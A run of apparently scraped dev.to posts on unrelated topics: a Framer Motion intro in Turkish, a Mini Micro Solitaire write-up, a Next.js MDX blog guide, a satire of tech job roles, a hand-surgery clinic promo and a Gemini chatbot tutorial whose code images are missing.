* [Neon](https://neon.tech/) — Serverless PostgreSQL platform built for the cloud.
### NoSQL Databases
### Document
* [CouchDB](https://couchdb.apache.org/) — Database that uses JSON to store data and JavaScript for MapReduce queries.
* [MongoDB](https://www.mongodb.com/) — Document database known for its flexibility and scalability.
* [Amazon DocumentDB](https://aws.amazon.com/documentdb/) — Managed MongoDB-compatible database service by AWS.
* [Azure Cosmos DB](https://azure.microsoft.com/en-us/services/cosmos-db/) — Globally distributed, multi-model database service by Microsoft.
* [Cloud Firestore](https://firebase.google.com/docs/firestore) — Scalable and flexible NoSQL cloud database to store and sync data for client- and server-side development.
### Graph
* [Dgraph](https://dgraph.io/) — Distributed, fast graph database.
* [Neo4j](https://neo4j.com/) — Leading graph database platform, known for its performance and scalability.
* [ArangoDB](https://www.arangodb.com/) — Native multi-model database supporting graph, document, and key-value data models.
* [Memgraph](https://memgraph.com/) — Real-time graph database for streaming data.
### Vector
* [Pinecone](https://www.pinecone.io/) — Vector database for machine learning and AI applications.
* [Milvus](https://milvus.io/) — Open-source vector database for AI and machine learning.
* [Weaviate](https://www.semi.technology/) — Open-source vector search engine.
### Time-Series
* [InfluxDB](https://www.influxdata.com/) — Open-source time-series database.
* [DolphinDB](https://www.dolphindb.com/) — High-performance time-series database.
* [TimescaleDB](https://www.timescale.com/) — PostgreSQL extension for time-series data.
* [Prometheus](https://prometheus.io/) — Open-source systems monitoring and alerting toolkit.
### Search
* [Elastic](https://www.elastic.co/) — Search engine based on the Lucene library.
* [Algolia](https://www.algolia.com/) — Hosted search API that provides fast and relevant search results.
* [Meilisearch](https://www.meilisearch.com/) — Open-source search engine that is fast and relevant out of the box.
* [Solr](https://solr.apache.org/) — Open-source search platform built on Apache Lucene.
### Key-Value
* [Redis](https://redis.io/) — In-memory data structure store, used as a database, cache, and message broker.
* [Memcached](https://memcached.org/) — High-performance distributed memory object caching system.
* [Amazon DynamoDB](https://aws.amazon.com/dynamodb/) — Fully managed proprietary key-value and document database by AWS.
* [KeyDB](https://keydb.dev/) — High-performance fork of Redis with multithreading.
### Multi-Model
* [ArangoDB](https://www.arangodb.com/) — Native multi-model database supporting graph, document, and key-value data models.
* [Fauna](https://fauna.com/) — Distributed, serverless database with document, graph, and relational models.
* [SurrealDB](https://surrealdb.com/) — Multi-model database for the cloud, edge, and IoT.
### Wide Column
* [Apache Cassandra](https://cassandra.apache.org/) — Distributed NoSQL database designed for high availability and scalability.
* [HBase](https://hbase.apache.org/) — Distributed, scalable, big data store.
* [ScyllaDB](https://www.scylladb.com/) — High-performance, Cassandra-compatible NoSQL database written in C++.
* [Datastax](https://www.datastax.com/) — Company behind Apache Cassandra-based products, including the managed Astra DB cloud database.
That's it, see you in the next one
Shrey | shreyvijayvargiya |
1,917,881 | Framer Motion | Giriş - Part 1 | Nedir ? Framer Motion, React uygulamalarında kolayca animasyon yapmanızı sağlayan bir kütüphanedir.... | 0 | 2024-07-10T00:08:55 | https://dev.to/boraacici/framer-motion-giris-part-1-1a8j | react, javascript, tutorial, webdev | **Nedir ?**
Framer Motion, React uygulamalarında kolayca animasyon yapmanızı sağlayan bir kütüphanedir. Geçiş ve sürükleme gibi animasyon efektleri eklemek için kullanılır.
**Kim Tarafından Oluşturulmuştur ?**
Framer firması tarafından oluşturulmuştur. Framer, özellikle kullanıcı arayüzü (UI) tasarımı ve prototipleme araçları geliştiren bir şirkettir.
**Nasıl Kurulur ?**
Framer React 18 ve üst versiyonlarını destekler. Npm üzerinden yüklemek için aşağıdaki komut çalıştırılır.
```
npm install framer-motion
```
Framer motion kütüphanesinin herhangi bir bağımlılığı yoktur ve tek paket ile uygulamaya başlayabilirsiniz.


As of this writing (10.07.2024), framer-motion sees roughly 3.4 million weekly downloads on npm and has 22,700 stars on GitHub, which shows how well it has been received by its users.
**Usage**

In any component you like, import the **_motion_** object from the _**framer-motion**_ library; you can then use a motion component for any HTML or SVG element.
```jsx
import { motion } from "framer-motion";
export default function App() {
return <motion.div />;
}
```
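A motion component animates whenever its `animate` prop changes. A minimal sketch using real `motion` props (the values below are just illustrative):

```jsx
import { motion } from "framer-motion";

export default function App() {
  return (
    <motion.div
      initial={{ opacity: 0, x: -100 }} // starting state
      animate={{ opacity: 1, x: 0 }}    // target state, animated on mount
      transition={{ duration: 0.5 }}    // half-second tween
    />
  );
}
```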
| boraacici |
1,917,882 | The Making of Solitaire for Mini Micro | Over the weekend I got the urge to create a Solitaire card game for Mini Micro. I completed it... | 0 | 2024-07-10T16:28:51 | https://dev.to/joestrout/the-making-of-solitaire-for-mini-micro-19hf | miniscript, minimicro, programming, gamedev | Over the weekend I got the urge to create a Solitaire card game for [Mini Micro](https://miniscript.org/MiniMicro/). I completed it Sunday night, the day after I started it. You can play it [here](https://joestrout.itch.io/solitaire), or download the source code [from GitHub](https://github.com/JoeStrout/ms-solitaire) and play it in your own copy of Mini Micro.
Let's take a look at the code, and see what you could apply to your own card games.
## Project Organization
If you go to the [repo](https://github.com/JoeStrout/ms-solitaire), you'll find three MiniScript (.ms) files:
- [solitaire.ms](https://github.com/JoeStrout/ms-solitaire/blob/main/solitaire.ms): this is the game itself.
- [title.ms](https://github.com/JoeStrout/ms-solitaire/blob/main/title.ms): this is the title screen/main menu.
- [startup.ms](https://github.com/JoeStrout/ms-solitaire/blob/main/startup.ms): this literally just runs _title.ms_ (automatically when Mini Micro boots).
This is a pretty common organization for smallish games. Develop your game as a stand-alone program in one file (or split it into multiple files, if it's getting big or unwieldy). Then write another script for the title screen and main menu. This should run the game file (_solitaire_ in this case) when the user clicks "Play", and conversely, modify your game script so that when the game is over, it runs the title script.
And finally, to ensure your game launches automatically when Mini Micro starts up, make a tiny _startup.ms_ script that just runs your title script.
## Building on CardSprite
There is a "cardFlip" demo included with Mini Micro. You can try it [here](https://miniscript.org/MiniMicro/index.html?cmd=run%20%22%2Fsys%2Fdemo%2FcardFlip.ms%22). Clicking the card causes it to flip over, and pressing the left/right arrow keys rotates it.

When a card flips over, it does a neat 3D effect, with a proper perspective distortion during the flip.

This requires some fairly complex math and some advanced features of Mini Micro's [Sprite class](https://miniscript.org/wiki/Sprite). Who wants to rewrite all that?
Fortunately, you don't have to! The cardFlip demo, like several others in the /sys/demo directory, is written in such a way that it can be used as an import module. You can tell this by pressing Control-C to break out of the demo, `edit`ing the source, and scrolling to the bottom, where you will find:
```
if locals == globals then demo
```
This is a common way for a script to distinguish between when it is the main program — in which case, locals will indeed equal globals — and when it has been [import](https://miniscript.org/wiki/Import)ed by some other script, in which case these will be different. So this says, if this is the main program, go ahead and run the demo. If not, then the script defines its classes and helper methods and so on, but doesn't actually _do_ anything visible to the user.
In this case, what it defines is a `CardSprite` class, subclassed from [Sprite](https://miniscript.org/wiki/Sprite), which knows how to approach a "target" defined by:
1. Position on the screen
2. Sprite scale
3. Sprite rotation
4. Flip state (faceUp = true to face up, or false to face down).
It also has a `speed` map that controls how quickly it approaches each of those target properties. So just by changing the target, and then calling `update` on every frame, you can make a CardSprite move around the screen and flip up or down as desired.

But, this script lives in /sys/demo, which is not part of the standard importPaths. So how can we import it? The solution is just to check [`env`](https://miniscript.org/wiki/Env)`.importPaths`, and add /sys/demo if it's not already there.
```
if not env.importPaths.contains("/sys/demo") then
env.importPaths.push "/sys/demo"
end if
import "cardFlip"
```
(Note that `contains` is not a standard Mini Micro method, but something added by the **listUtil** module, which we already imported at the top of the program.)
So now that we've successfully imported cardFlip as a module, we can access and subclass `cardFlip.CardSprite`.
```
Card = new cardFlip.CardSprite
```
Much of the Solitaire is building out this class. We add convenience methods like `goToInSecs` and `goToAtSpeed` that let us more easily specify a target position and speed, to make cards fly around the screen in just the right way. We also add a `moveToFront` method that ensures the card is at the top of the sprite list, so it appears in front of all other cards. Finally, there are some Solitaire-specific methods added here, such as `canGoOnFoundation` and `canGoOnTab`, which check whether putting a card in a certain pile would be a legal move in the game.
## Using smaller/alternate cards
Mini Micro comes with a bunch of built-in [playing card images](https://github.com/JoeStrout/minimicro-sysdisk/tree/master/sys/pics/cards) which come from [Kenney's Boardgame Pack](https://kenney.nl/assets/boardgame-pack). I love these card images, and when I started the project my goal was to demonstrate a game made using only these built-in assets.
Halfway through development, I realized that they're just a smidge too big. The cards are 140 pixels across, and in Klondike Solitaire, you need seven columns of cards with at least a little gap in between. 7 times 140 is 980 pixels, but our Mini Micro screen is only 960 pixels wide. I tried to cram them in anyway, but it didn't look great.

Of course all Mini Micro sprites can be scaled at runtime, and that includes these cards. But the scaling algorithm it uses is "nearest-neighbor", rather than some form of blending. This doesn't produce a very pretty result with text and sharp icons, like you find on playing cards, especially when using an odd scaling factor like 0.8.

I really wanted this game to look nice and polished. So, I went back to Kenney's pack, loaded the vector (SVG) card image, and re-exported everything at a smaller scale (120 pixels wide instead of 140). Then I updated the code to load from my custom pics directory, rather than /sys/pics/cards.
```
CARDPICS = "pics/cards-120/"
```
...
```
Card.image = file.loadImage(CARDPICS + "cardClubsA.png")
Card.localBounds.width = Card.image.width
Card.localBounds.height = Card.image.height
```
This included the code in the `createDeck` function that loaded all 52 cards:
```
Card.backImage = file.loadImage(CARDPICS + "cardBack_blue4.png")
outer.cards = cardDisp.sprites
// create the cards
ranks = ["A"] + range(2,10) + ["J", "Q", "K"]
for suit in "Clubs Diamonds Hearts Spades".split
for rank in ranks
card = new Card
card.speed = Card.speed + {}
card.frontImage = file.loadImage(CARDPICS + "card" + suit + rank + ".png")
card.rank = rank
card.rankVal = 1 + ranks.indexOf(rank)
card.suit = suit
card.red = (suit == "Diamonds" or suit == "Hearts")
card.black = not card.red
cards.push card
end for
end for
```
After those changes, everything else worked the same. You can see the difference if you click on the final image below, and compare it to the last one above.

If you're making your own Mini Micro card game, I encourage you to use the built-in cards if possible... but if you need slightly smaller ones, feel free to grab them from [my repo](https://github.com/JoeStrout/ms-solitaire/tree/main/pics/cards-120)!
## Card Management
Next, some general notes about how to manage a deck of cards in a game.
In Solitaire, I kept all the playing cards, and _only_ the playing cards, in one SpriteDisplay. I had another SpriteDisplay behind that for the wells (translucent dark areas indicating where you can pile up cards), and if I needed some UI elements (buttons etc.) on top of the cards, I would put those in a third SpriteDisplay above the cards. But having a display that's _just_ cards lets me make the sprite list and my "all cards in the game" list one and the same. This was actually accomplished in the deck-loading code above, where it says:
```
outer.cards = cardDisp.sprites
```
So now my rule is: never remove a card from this `cards` list, unless you immediately add it back. Removing a card from the list would remove it from the display, and also from the game. That would be appropriate in some kind of deck-building game where cards can be permanently removed from play, but for most card games, it's generally not something you want to do.
Then the gameplay consists of only moving these cards around on screen, arranging them in the desired order, and flipping them face-up or face-down. When you see something like a stack of cards for a draw pile, all the card sprites really are there — no need to get clever and try to remove the cards below the top one in the stack. Sprites are super efficient; Mini Micro can handle them all without breaking a sweat.
## Keeping Things Moving
The only other technique that seems noteworthy to me, is how I ensure that all the cards can continue moving towards their targets. This requires calling `update` on each card on every frame. So we start by making a function that does that for one frame:
```
updateCards = function
for sp in cardDisp.sprites
sp.update
end for
end function
```
But now, sometimes I want to wait a bit before doing something. For example, if playing the "hard" version of the game, cards are drawn 3 at a time. But I don't want to simultaneously draw 3 cards; I want to draw one, wait a bit, draw the second, wait a little more, and then draw the third.
If I just called the built-in `wait` function for these delays, it would cause the cards I've already drawn to freeze during the wait. That's no good! So, I made this function:
```
waitButUpdate = function(delay = 1)
t1 = time + delay
while time < t1
updateCards
yield
end while
end function
```
Now we can call `waitButUpdate`, which acts exactly like `wait`, except that during the delay, it updates the cards on every frame. Now my draw-three-cards code can do stuff like
```
card.goToInSecs x, WASTEPOS.y, 0.5
card.target.faceUp = true
card.moveToFront
waitButUpdate 0.25
```
and wait a quarter second for this card to start its flip, before proceeding to the next card.

## Conclusion
Making a card game in Mini Micro was a fun and easy project. Using the CardSprite class from /sys/demo/cardFlip, you can easily create very polished animations as your cards move around the table and flip over to face up or down. With the built-in card images, you can get started with most standard card games right away; but if you need to swap in a different set of cards, as I did here, that's easy enough to do.
Feel free to study and borrow from the Solitaire script for your own games, too. Many of the extensions made in its CardSprite subclass would be generally applicable to any card game. You can also see how I handled clicking and dragging cards with the mouse (see the `clickDragCard` function), and adapt it to your needs.
Since Mini Micro was released, I've been hoping to see people creating card games with it. There are [_so many_ classic card games](https://boardgamegeek.com/geeklist/42199/traditional-card-games-that-should-be-played-more), the rules of which are almost always in the public domain, and players for which can be hard to find when you get an urge to play. That makes them ripe opportunities for computer adaptations!
So, here's hoping my little Solitaire game — and this behind-the-scenes write-up — will inspire you. Let me know what you think in the comments below!
| joestrout |
1,917,883 | [Game of Purpose] Day 52 | Today I was working on making Manny go along the spline. And it is functioning somewhat... | 27,434 | 2024-07-09T23:38:30 | https://dev.to/humberd/game-of-purpose-day-52-50cj | gamedev | Today I was working on making Manny go along the spline. And it is functioning somewhat properly.
{% embed https://youtu.be/rfgzU8qpxWs %}
I am really considering moving some functions to C++. The reason is that the ones using multiple variables are really hard to read and write.
For example, the one which moves Manny along the spline is a huge spaghetti.

Notice the 2 guarding ifs, then the execution, and then invoking the event again. It would be 15 lines in C++, easy stuff. However, in Blueprints it's REALLY hard to know what is going on without any comments.
| humberd |
1,917,884 | How to Create a Blog Using NextJS v14 and MDX: A Comprehensive Guide | It is very effective to develop a blog since it helps to showcase and share acquired knowledge,... | 0 | 2024-07-09T23:42:31 | https://www.ginos.codes/blog/create-blog-nextjs-mdx | webdev, react, nextjs, typescript | Developing a blog is a very effective way to showcase and share acquired knowledge, relevant experiences, and updates with a larger audience. Recently, I integrated a blog feature on my website with NextJS v14, MDX, and a few other libraries. This blog post will guide you through the steps I followed to build it: configuring Next.js, adding the needed dependencies, and wiring everything together.
## Why I Chose to Blog
I began this blog to give an open look into my work process: what I think and do when turning concepts into tangible products, and why. As a developer, I often work on projects where an application goes from a mere idea to concrete reality in a fairly short time. Documenting this journey serves several purposes:
1. **🕵️♂️ Transparency**: I describe the practices I rely on to keep my projects efficient and effective. For aspiring developers, it is often useful to observe how someone with more experience goes about solving a problem.
2. **💡 Inspiration**: Sharing my motivations and the reasons behind my projects can inspire others to pursue their own ideas. Understanding the "why" behind a project often provides the fuel needed to push through challenges and stay committed.
3. **📚 Documentation**: Keeping a record of my development journey helps me track my progress and reflect on the lessons learned. It's a valuable resource for future reference and continuous improvement.
4. **🗣️ Community Engagement**: A blog makes two-way communication easy. Readers can leave feedback and comments on articles, which brings new ideas, collaboration, and fellowship.
My objective is to document and share every stage of forming an idea and turning it into an actual project, and in doing so motivate others to share their own ideas. It is my way of giving something back to the developer community and helping to build its knowledge base.
_So... how did I do it?_
## Adding and Configuring the dependencies
Next.js supports MDX (Markdown with embedded JSX) with some additional configuration. Here’s how I set it up:
### Install Required Packages
I installed the necessary MDX packages and related dependencies:
```bash
npm install @mdx-js/loader @mdx-js/react @next/mdx @tailwindcss/typography
```
#### Update `next.config.js`
We must add the withMDX plugin to the Next.js configuration file.
```tsx
// next.config.js
const withMDX = require("@next/mdx")();
const nextConfig = {
// Rest of the configuration
pageExtensions: ["js", "jsx", "mdx", "ts", "tsx"],
};
module.exports = withMDX(nextConfig);
```
#### Update `tailwind.config.ts`
I'm using Tailwind CSS, so I must add the typography plugin to the Tailwind config file.
```tsx
// tailwind.config.ts
const config = {
// Rest of the configuration
plugins: [require("@tailwindcss/typography")],
}
```
### Create required components to render the MDX
We will create an MdxComponents file that will allow us to define how each element of the MDX is rendered.
```tsx
// components/MdxComponents.tsx
import Link from "next/link";
import { MDXComponents } from "mdx/types";
import { Ref } from "react";
import { Code } from "bright";
export const mdxComponents: MDXComponents = {
pre: (props) => (
<Code
theme={"github-dark"}
{...props}
style={{
margin: 0,
}}
/>
),
a: ({ children, ref, ...props }) => {
return (
<Link href={props.href || "."} ref={ref as Ref<HTMLAnchorElement> | undefined} {...props}>
{children}
</Link>
);
},
File: ({ children, path, ...props }) => {
return (
<div className="bg-gray-950 pt-1 rounded-3xl">
<div className="flex items-center ml-4 my-2 italic font-semibold">{path}</div>
{children}
</div>
);
},
};
export default mdxComponents;
```
For example, in the code above, we define how the `pre` tag is rendered: we use the `Code` component from the `bright` library to render code blocks with syntax highlighting. We also define how the `a` tag is rendered, using the `Link` component from Next.js to render links. Finally, we define a custom `File` component that renders a file path above the code block.
_The File component is exactly what I'm using to render the code blocks in this blog post!_
Let's create the component to render the MDX!
```tsx
// components/BlogPost.tsx
import { MDXRemote } from "next-mdx-remote/rsc";
import remarkGfm from "remark-gfm";
import rehypeSlug from "rehype-slug";
import rehypeAutolinkHeadings from "rehype-autolink-headings";
import remarkA11yEmoji from "@fec/remark-a11y-emoji";
import remarkToc from "remark-toc";
import mdxComponents from "./MdxComponents";
export default function BlogPost({ children }: { children: string }) {
return (
<div className="prose prose-invert min-w-full">
<MDXRemote
source={children}
options={{
mdxOptions: {
remarkPlugins: [
// Adds support for GitHub Flavored Markdown
remarkGfm,
// Makes emoji accessible ! adding aria-label
remarkA11yEmoji,
// generates a table of contents based on headings
[remarkToc, { tight: true }],
],
// These work together to add IDs and linkify headings
rehypePlugins: [rehypeSlug, rehypeAutolinkHeadings],
},
}}
components={mdxComponents}
/>
</div>
);
}
```
This is the component that will render the blog post, it uses the `MDXRemote` component from `next-mdx-remote/rsc` to render the MDX content. We also pass some options to the `MDXRemote` component to enable support for GitHub Flavored Markdown, accessible emojis, and table of contents generation. The `mdxComponents` object contains the components that will be used to render the MDX content.
### Create the logic to fetch the blog posts
We will define the types for the blog posts and create a function to fetch all the posts.
```tsx
// types.d.ts
export type IBlogPost = {
date: string;
title: string;
description: string;
slug: string;
tags: string[];
body: string;
};
```
We will store our `.mdx` files under the /posts path, and we will use the `gray-matter` library to parse the front matter of each file.
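For reference, a post file might look like this. The front-matter keys mirror the `IBlogPost` type defined above, plus the optional `published` flag checked later; the file name and values are just examples:

```mdx
---
title: "My First Post"
description: "A short summary shown on the blog card."
date: "2024-07-09"
slug: "my-first-post"
tags: ["nextjs", "mdx"]
published: true
---

## Hello

This is the post **body**, written in MDX.
```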
Create a file to define the functions to fetch all blog posts.
```tsx
// lib/blog.ts
import matter from "gray-matter";
import path from "path";
import fs from "fs/promises";
import { cache } from "react";
import { IBlogPost } from "@/types";
export const getPosts: () => Promise<IBlogPost[]> = cache(async () => {
  const files = await fs.readdir("./posts/");
  const posts = await Promise.all(
    files
      .filter((file) => path.extname(file) === ".mdx")
      .map(async (file) => {
        const filePath = `./posts/${file}`;
        const postContent = await fs.readFile(filePath, "utf8");
        const { data, content } = matter(postContent);
        // Not published? No problem, don't show it.
        if (data.published === false) {
          return undefined;
        }
        return { ...data, body: content } as IBlogPost;
      })
  );
  // Filter after the promises resolve, so unpublished posts are dropped.
  return posts.filter((post): post is IBlogPost => post !== undefined);
});
export async function getPost(slug: string) {
const posts = await getPosts();
return posts.find((post) => post?.slug === slug);
}
export default getPosts;
```
The `getPosts` function reads all the files in the /posts directory, filters out the non-MDX files, and parses the front matter using `gray-matter`. It then returns an array of objects containing the post data and body content. The `getPost` function fetches a specific post based on its slug.
### Create a Blog Page
Now let's create the page where we will display all the blog posts.
I created a route group to be able to define a layout for the blog pages; you don't need to if you don't need a shared layout.
```tsx
// app/(blog)/blog/page.tsx
// Here's where we will display all the blog posts
import BlogCard from "@/components/BlogCard";
import getPosts from "@/lib/blog";
export default async function PostPage() {
const posts = await getPosts();
return (
<>
<h1 className="text-5xl">
The <span className="font-bold">Blog</span>.
</h1>
<div className="flex flex-col space-y-10 mt-4 p-5">
<div>
<ol className="group/list">
{posts.map((post, i) => (
<li
className={`mb-12 animate-ease-in animate-delay-500 ${i % 2 == 0 ? "animate-fade-right" : "animate-fade-left"}`}
key={i}
>
{/* Remember to always define a key when doing a map function.*/}
<BlogCard {...post} key={i} />
</li>
))}
</ol>
</div>
</div>
</>
);
}
```
The `PostPage` component fetches all the blog posts using the `getPosts` function and maps over them to render a `BlogCard` component for each post. The `BlogCard` component will display the post title, description, and tags.
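The `BlogCard` component itself isn't shown in this post. A minimal, hypothetical version matching the `IBlogPost` fields could look like this (the file name and styling are my own placeholders, not the original implementation):

```tsx
// components/BlogCard.tsx (hypothetical minimal version)
import Link from "next/link";
import { IBlogPost } from "@/types";

export default function BlogCard({ title, description, slug, tags }: IBlogPost) {
  return (
    <Link href={`/blog/${slug}`} className="block">
      <h2 className="text-2xl font-bold">{title}</h2>
      <p className="text-gray-400">{description}</p>
      <ul className="flex gap-2">
        {tags.map((tag) => (
          <li key={tag}>#{tag}</li>
        ))}
      </ul>
    </Link>
  );
}
```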
And then we can create the page for the specific post.
```tsx
// app/(blog)/blog/[slug]/page.tsx
import BlogPost from "@/components/BlogPost";
import getPosts, { getPost } from "@/lib/blog";
import { notFound } from "next/navigation";
export async function generateStaticParams() {
const posts = await getPosts();
return posts.map((post) => ({ slug: post?.slug }));
}
export default async function PostPage({
params,
}: {
params: {
slug: string;
};
}) {
const post = await getPost(params.slug);
if (!post) return notFound();
return <BlogPost>{post?.body}</BlogPost>;
}
```
The `PostPage` component fetches the specific post based on the slug provided in the URL. If the post is not found, it returns a 404 page using the `notFound` function from `next/navigation`. The `BlogPost` component renders the post content using the `MDXRemote` component.
### Create a Sitemap
Creating a sitemap is essential for search engine optimization (SEO) and helps search engines discover and index your website's pages. We can create a sitemap using a serverless function in Next.js.
```tsx
// app/sitemap.ts
import { getPosts } from "@/lib/blog";
export default async function sitemap() {
// Define the routes that should be included in the sitemap
const routes = ["", "/blog"].map((route) => ({
url: `https://ginos.codes${route}`,
lastModified: new Date().toISOString().split("T")[0],
}));
// Get all posts and create a sitemap route for each one
const posts = await getPosts();
const blogs = posts.map((post) => ({
url: `https://ginos.codes/blog/${post.slug}`,
lastModified: new Date(post.date).toISOString().split("T")[0],
}));
return [...routes, ...blogs];
}
```
The `sitemap` function defines the routes that should be included in the sitemap. It includes the homepage and the blog page. It then fetches all the blog posts and creates a sitemap route for each post, including the post URL and last modified date.
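For reference, the array this function returns looks something like the following (the URLs and dates are illustrative):

```tsx
[
  { url: "https://ginos.codes", lastModified: "2024-07-09" },
  { url: "https://ginos.codes/blog", lastModified: "2024-07-09" },
  { url: "https://ginos.codes/blog/create-blog-nextjs-mdx", lastModified: "2024-07-09" },
]
```

Next.js serializes this into the XML sitemap served at `/sitemap.xml`.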
## Conclusion
In this guide, we covered the complete process of setting up a blog using NextJS v14 and MDX. From installing and configuring necessary dependencies to creating and displaying blog posts, each step is crucial for a functional and aesthetically pleasing blog. By following these steps, you can easily set up a blog that is not only easy to manage but also SEO-friendly. | pineapplegrits |
1,917,885 | The Evolution of Hand Surgery: Innovations and Contributions by SunMay Clinic | Introduction Hand surgery has advanced significantly over the years, playing a crucial role in... | 0 | 2024-07-09T23:49:34 | https://dev.to/sunmayclinic/the-evolution-of-hand-surgery-innovations-and-contributions-by-sunmay-clinic-cdc | socialmedia, mentalhealth, microsoftgraph | **Introduction**
Hand surgery has advanced significantly over the years, playing a crucial role in restoring hand function and improving quality of life for patients. SunMay Clinic in Astana stands at the forefront of these advancements, integrating cutting-edge technologies and personalized care to achieve remarkable results. This article explores the evolution of hand surgery, highlighting SunMay Clinic's innovative contributions and commitment to excellence in medical care.
**The Evolution of Hand Surgery**
**Early Beginnings**
The history of hand surgery dates back to ancient times when basic surgical techniques were used to treat injuries and deformities. Over the centuries, advancements in anesthesia, sterilization, and surgical techniques laid the foundation for modern hand surgery.
**The Advent of Modern Hand Surgery**
The 20th century witnessed significant advancements in hand surgery, driven by technological innovations and specialized surgical techniques. These developments enabled surgeons to address complex hand injuries, deformities, and conditions with greater precision and success rates.
**Technological Advancements**
SunMay Clinic has embraced technological advancements to enhance surgical outcomes and patient care. Advanced imaging technologies, such as MRI and CT scans, enable precise diagnosis and treatment planning. Microsurgery techniques allow for intricate procedures, such as nerve repair and tissue reconstruction, with minimal tissue damage and faster recovery times.
**Specialized Care at SunMay Clinic**
**Comprehensive Treatment Approach**
SunMay Clinic offers a comprehensive approach to hand surgery, tailored to meet the unique needs of each patient. From trauma care to reconstructive surgery and rehabilitation, our multidisciplinary team of specialists provides personalized treatment plans designed to achieve optimal outcomes.
**Innovations by SunMay Clinic**
SunMay Clinic is dedicated to pioneering excellence in hand surgery. Our innovations include:
- **Advanced Rehabilitation Programs:** Tailored rehabilitation programs that promote recovery and restore hand function.
- **Minimally Invasive Techniques:** Utilization of minimally invasive surgical techniques to minimize scarring and accelerate healing.
- **Patient-Centered Care:** Emphasis on patient education and support throughout the treatment journey, ensuring informed decision-making and improved outcomes.
**Success Stories**
Numerous success stories at SunMay Clinic illustrate our commitment to patient care and surgical excellence. Patients like Victor, a professional musician who regained hand mobility after a severe injury, exemplify the transformative impact of our specialized treatments and dedicated care.
**Conclusion**
SunMay Clinic continues to lead the way in advancing hand surgery, driven by innovation, expertise, and a commitment to patient-centric care. As we look to the future, our focus remains on improving outcomes, enhancing quality of life, and pioneering new standards in hand surgical practice. | sunmayclinic |
1,917,886 | Bullshit Tech Roles (satire) | In any sufficiently well-funded or otherwise successful tech company, a set of new roles will... | 0 | 2024-07-09T23:50:55 | https://dev.to/anttiviljami/bullshit-tech-roles-satire-54f | satire, techjobs | In any sufficiently well-funded or otherwise successful tech company, a set of new roles will inevitably emerge—so crucial and revered by our industry that they've practically transcended the need to produce any tangible work. These roles specialize in the fine art of enabling others, in the hopes that, one day, the actual builders might be enabled enough to deliver products to customers.
I'm talking, of course, about the agile coaches and scrum masters, the architects and platform engineers; the growth hackers and data-driven researchers. These vanguards of innovation are vital to any team that wants to maintain a perpetual state of being maximally enabled, well-informed, and facilitated to perform their work.
Let's begin with the often underappreciated roles of agile coaches and scrum masters, the only people in a company actually certified™️ to set up the correct processes and tools to run an agile team. This, of course, is paramount for implementing agile—the popular software development philosophy that explicitly tells us to avoid focusing on processes and tools.
Agile coaches and scrum masters are professionals whose primary job is to ensure all work in teams is performed in sprints, with daily stand-up meetings to guarantee everyone is constantly enabled. This allows the velocity of a team to be meticulously measured in story points, which no one quite understands, but hey, at least we're definitely data-driven.
Surely, without their meticulous facilitation, teams would be left wandering aimlessly, unsure of how to break down their work into JIRA tickets. Their presence ensures that everyone stays aligned and that every team member is reminded of their blockers and sprint goals every single morning. Because nothing screams productivity like a daily stand-up where everyone takes turns saying, "no updates from my side."
Next, we have the architects. These exceptionally gifted, usually very senior engineers haven't touched any production code in the current decade. They are often found in their natural habitat, PowerPoint, where they sketch out their grand visions of future systems and envision platform rewrites for actual software engineers to implement.
Their role is to think so far ahead that their ideas become completely theoretical, creating software designs that are so advanced, they may never actually be implemented. But that's not the point. The point is to have a shared vision, to inspire, to draw boxes and lines that will one day guide the hands of actual engineers who might one day understand what they were trying to convey.
Then, there are the platform engineers. A demanding role with zero responsibility to deliver anything of value to customers. These unsung heroes dedicate their time to building and maintaining the internal tools and infrastructure that supposedly makes everyone else's job easier. Yet, their true skill lies in making things so complicated that only they can understand and manage them.
They manage infrastructure, design intricate CI/CD pipelines, common libraries and tools that add layers upon layers of necessary abstraction, which they insist must be adopted and standardized across all teams. The result? All teams having to learn and depend on custom in-house tools so complex that even the slightest changes require a detailed consultation with the platform team, ensuring their perpetual job security.
And then we have the growth hackers, the avant-garde marketers of the tech world. Their job is to come up with innovative ways to "hack" company growth, often resorting to questionable methods that straddle the line between clever marketing and outright deceit. They dive into data, running A/B tests, tweaking landing pages, and optimizing user funnels to squeeze out the tiniest incremental gains.
Of course, the real growth usually comes from the core product being genuinely useful, but why let that overshadow the need for an entire team devoted to marginal tweaks and vanity metrics?
Data-driven researchers are the prophets of the modern tech age. Armed with vast amounts of data and research, they uncover profound insights such as "users prefer faster load times" or "clearer buttons improve user engagement." Their work truly brings scientific rigor, managing to bring impressive-sounding numbers and great data visualizations to argue for any side of a decision, usually the one they already went with before doing any research.
These bullshit roles are the pillars upon which modern tech companies stand. They enable a culture where productivity is constantly measured, documented, and discussed, albeit often at the expense of actual productivity.
Without them, who would ensure that calendars get filled with back-to-back meetings so that everyone is too busy to notice no work is getting done? Who would write all the documents and Slack messages, ensuring no detail is left unshared or undiscussed? In doing so, these roles truly create a seamless, endless flow of communication, although one might argue that less talk and more doing might yield better results.
But where's the fun in that? | anttiviljami |
1,917,887 | Creating a Generative AI Chatbot with JavaScript | Introduction Generative AI has become a popular topic in the technology field over the past year.... | 0 | 2024-07-09T23:56:04 | https://dev.to/rodliraa/creating-a-generative-ai-chatbot-with-javascript-3flk | Introduction
Generative AI has become a popular topic in the technology field over the past year. Many developers are creating interesting projects using this technology. Google has developed its own generative AI model called Gemini.
In this article, we will build a simple ChatBot with Node.js and integrate Google Gemini. We will use the Google Gemini SDK for this purpose.
What is Gemini?
Google Gemini is an advanced AI model developed by Google AI. Unlike traditional AI models, Gemini is not limited to text processing. It can also understand and operate on various formats such as code, audio, images and video. This feature opens up exciting possibilities for your Node.js projects.
Setting Up the Environment
- Install Required Packages
To create a generative AI chatbot with JavaScript, you'll need to install the following packages using npm or yarn:

- Update package.json
Update your package.json file to include the type field:

- Replace API Key
Replace the API_KEY in your index.js file with your own API key from Google AI Studio.
Integrating Google Gemini
- Import Required Modules
Use ES6 import syntax for cleaner code:

- Initialize the Chatbot
Initialize the chatbot and set up the user input mechanism:

Customizing the User Interface
- Use ora and chalk
Customize the user interface with ora and chalk for a more responsive and user-friendly experience:

- Handle User Input
Handle user input and respond accordingly:

Running the Chatbot
Run the chatbot using Node.js:

Example Code
Here's a complete example of how to create a generative AI chatbot using JavaScript:

Conclusion
By following these steps, you can create a generative AI chatbot that integrates Google Gemini and provides a user-friendly interface. This chatbot can handle user input and generate responses using the Google Gemini AI model. | rodliraa | |
